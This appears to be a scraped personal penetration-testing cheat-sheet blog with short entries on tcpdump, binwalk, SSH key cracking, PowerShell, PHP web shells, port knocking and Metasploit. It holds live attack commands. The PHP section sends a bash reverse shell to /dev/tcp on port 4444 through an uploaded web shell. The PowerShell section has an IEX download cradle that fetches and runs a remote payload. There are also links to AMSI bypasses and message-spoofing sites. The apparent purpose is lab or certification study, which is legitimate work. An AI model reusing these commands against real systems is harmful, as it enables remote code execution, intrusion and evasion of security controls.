Categorieën
TCPDUMP Uncategorized

TCPDUMP

tcpdump -i tun0 icmp (for protocol filter)

Categorieën
Steno Uncategorized

Steno

Look at picture for content

  • binwalk file.png

Extract files from image

  • binwalk -Me file.png
Categorieën
SSH Uncategorized

SSH

Use SSH private key

.priv

chmod 600 key.priv

ssh -i key.priv user@x.x.x.x

Extract Password from id_rsa key

python /usr/share/john/ssh2john.py id_rsa > test

john –wordlist=/usr/share/SecLists/Passwords/Leaked-Databases/rockyou-50.txt test

Categorieën
Sites Uncategorized

Interesting Sites

Recon / Enumeration

http://www.lifeoverpentest.com/ https://backdoorshell.gitbooks.io/oscp-useful-links/ https://www.hackingarticles.in/a-little-guide-to-smb-enumeration/ https://shahmeeramir.com/penetration-testing-of-an-ftp-server-19afe538be4b https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/ https://www.tarlogic.com/en/blog/how-to-attack-kerberos/ http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet https://www.thegeekstuff.com/2010/07/execute-shell-script/ https://hashes.org/ https://github.com/blackploit/hash-identifier.git

https://ired.team/offensive-security-experiments/offensive-security-cheetsheets

https://www.secjuice.com/powershell-constrainted-language-mode-bypass-using-runspaces/

https://github.com/rasta-mouse?tab=repositories

Exploring PowerShell AMSI and Logging Evasion

https://iwantmore.pizza/posts/amsi.html

https://github.com/d0nkeys/redteam/tree/master/code-execution

https://github.com/d0nkeys/redteam

Working AMSI Bypass

https://github.com/aloksaurabh/OffenPowerSh/blob/master/Bypass/Invoke-AmsiBypass.ps1

 

 

 

 

Exploits

https://nvd.nist.gov/vuln/search https://www.exploit-db.com/ https://packetstormsecurity.com/ https://www.securityfocus.com/vulnerabilities https://0day.tday http://mvfjfugdwgc5uwho.onion/

Social engineering

https://www.spoofmytextmessage.com/ https://www.spoofmyemail.com/

https://goo.gl tinyurl.com

Categorieën
python Uncategorized

Python

SimpleHTTPServer

  • python -m SimpleHTTPServer 4343 (default 8000)

SHELL

  • python -c ‘import pty;pty.spawn(“/bin/bash”)’
  • stty raw -echo //now push enter enter once type fg enter enter twise

*check rows & colums stty -a stty rows 34 cols 136

export TERM=xterm

Categorieën
Powershell tips Uncategorized

Powershell

Encode BASE64

  • cat reverse.ps1 | iconv -t UTF-16LE | base64 -w0
  • nc -lvnp 9001 (listener)
  • $username = ‘username’
  • $password = ‘password’
  • $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
  • $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
  • enter-pssession -computername x.x.x.x -Port 5985 -credential $credential

*powershell “IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.9:8000/exploit.html‘)”

Categorieën
Port Knocking Uncategorized

Port Knocking

Check for port knock services

  • /etc/init.d$ ls
  • less knockd

Check config file

  • etc/default/knowckd

Run tcp packet on required ports

*for i in 571 290 911; do nmap -Pn -p $i –host-timeout 201 –max-retries 0 x.x.x.x; done

Categorieën
PHP Uncategorized

PHP

PHP

Upload php code exec script

https://www.acunetix.com/websitesecurity/php-security-2/

PHP shell

in url go to shell.php?command=whoami

In Burpsuite create post request

POST /url/shell.php HTTP/1.1 content command=bash -c ‘bash -i >& /dev/tcp/x.x.x.x/4444 0>&1′

URL encode it to command=bash+-c+’bash+-i+>%26+/dev/tcp/x.x.x.x/4444+0>%261’

Setup NC to listen for incoming connections nc -lvnp x.x.x.x 4444

Categorieën
Nessus Uncategorized

Nessus

/etc/init.d/nessusd start https://127.0.0.1:8834

Categorieën
Metasploit

Metasploit tips

systemctl start postgresql
cp /usr/share/exploitdb/exploits/cgi/webapps/42344.rb /root/.msf4/modules/exploits/cgi/webapps/
updatedb

sessions -u
  • search delivery for web payload deliver
  • search autoroute for session routes
  • search smb_version
  • search arp_sweep

Vulnerability Scanning in Metasploit

db_nmap -v --script vuln 192.168.0.184
  • hosts
  • services

Port forwaring

portfwd add –l 3389 –p 3389 –r target-host

Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell